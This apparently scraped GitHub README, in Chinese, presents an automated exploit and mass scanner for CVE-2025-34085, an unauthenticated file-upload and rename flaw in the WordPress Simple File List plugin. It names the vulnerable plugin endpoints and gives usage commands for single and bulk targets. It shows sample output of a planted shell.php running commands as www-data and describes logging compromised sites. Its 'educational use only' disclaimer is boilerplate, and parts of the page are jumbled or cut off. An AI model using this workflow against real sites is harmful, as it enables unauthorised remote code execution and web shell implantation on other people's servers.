针对 CVE-2025-34085 的自动化利用与扫描器,该漏洞存在于 WordPress Simple File List 插件中,通过任意文件上传和重命名功能实现未认证远程代码执行。
未认证文件上传
/wp-content/plugins/simple-file-list/ee-upload-engine.php重命名为 PHP 扩展名
.php 或类似扩展名:/wp-content/plugins/simple-file-list/ee-file-engine.php执行 Payload
python3 CVE-2025-34085.py -u http://target.com --cmd "id"
将目标 URL 放入 targets.txt(每行一个),然后运行:
python3 CVE-2025-34085.py --cmd "whoami"
| 参数 | 描述 |
|---|---|
-u | 目标 URL(例如 http://example.com) |
[+] http://target.com | http://target.com/wp-content/uploads/simple-file-list/shell.php
uid=33(www-data) gid=33(www-data) groups=33(www-data)
成功的目标会被保存到 vuln.txt。
CVE-2025-34085.py — 主漏洞利用脚本targets.txt — (可选)目标域名列表vuln.txt — 成功利用的记录日志管理员应:
本项目仅供教育和授权测试使用。 作者对因使用本工具造成的滥用或损害不承担任何责任。
本项目采用 MIT 许可证 授权。 📄 查看完整许可证文本
0xgh057r3c0n 🔗 GitHub: github.com/0xgh057r3c0n
--cmd在远程 shell 上执行的命令(默认: id) |
--inline | 使用内联 payload(不使用 ?cmd= 参数) |